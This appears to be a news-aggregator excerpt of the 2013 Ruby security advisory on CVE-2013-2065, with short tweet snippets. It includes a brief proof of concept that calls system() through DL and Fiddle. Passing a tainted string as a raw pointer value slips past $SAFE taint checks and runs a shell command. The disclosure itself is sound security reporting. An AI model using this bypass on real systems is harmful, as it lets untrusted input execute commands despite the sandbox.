14 May '13, 3pm

Object taint flag bypass in DL and Fiddle (CVE-2013-2065): In DL and Fiddle, $SAFE...

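require 'dl'
require 'fiddle'

def my_function(input)
  # Look up system(3) in the running process and wrap it as a native function.
  handle = DL.dlopen(nil)
  sys = Fiddle::Function.new(handle['system'], [Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT)
  sys.call input
end

$SAFE = 1
user_input = "uname -rs".taint
# The tainted string is handed over as a numeric address (an Integer).
my_function DL::CPtr[user_input].to_i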

Full article: http://www.ruby-lang.org/ja/news/2013/05/14/taint-bypass-...

Tweets

Object taint bypassing in DL and Fiddle in Ruby...

ruby-lang.org 14 May '13, 2pm

Object taint bypassing in DL and Fiddle in Ruby (CVE-2013-2065) There is a vulnerability in DL and Fiddle in Ruby where ta...